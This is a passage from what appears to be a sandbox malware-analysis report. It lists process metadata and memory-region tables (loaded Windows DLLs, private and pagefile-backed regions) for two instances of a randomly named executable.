"\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4280 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4281 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4282 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4283 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4284 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4285 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4286 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4287 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4681 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4682 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4683 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4684 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4685 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4686 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4687 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4688 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 4912 start_va = 0x480000 end_va = 0x4a9fff monitored = 0 entry_point = 0x485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4913 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 5438 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 111 os_tid = 0x990 Thread: id = 129 os_tid = 0x654 Process: id = "24" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd4bd000" os_pid = "0x1244" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3902 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3903 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3904 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3905 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3906 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3907 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3908 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3909 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3910 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3911 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3912 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3913 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3914 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3915 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3916 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3917 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4032 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 4033 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4034 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4051 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4052 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4053 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4054 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4055 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4344 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4345 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4346 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4347 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4348 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4349 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 4350 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4351 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4352 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4353 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4354 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4355 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4356 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4357 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4358 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4359 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4360 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4361 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4362 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4363 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4364 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4365 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4745 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4746 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4747 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4748 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 4910 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4911 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 4914 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 112 os_tid = 0x128c Thread: id = 134 os_tid = 0xcc4 Process: id = "25" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd5c2000" os_pid = "0x818" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3925 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3926 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3927 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3928 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3929 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3930 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3931 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3932 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3933 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3934 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3935 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3936 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3937 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3938 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3939 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3940 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4072 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4073 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4074 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4075 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4076 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4093 start_va = 0x510000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 4094 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4095 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4437 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4438 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4439 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4440 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4441 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4442 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 4443 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 4444 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 4445 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4446 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4447 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4448 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4449 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4450 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4451 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4452 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4453 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4454 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4455 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4456 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4814 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4815 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4816 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4817 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4818 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4819 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4820 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: 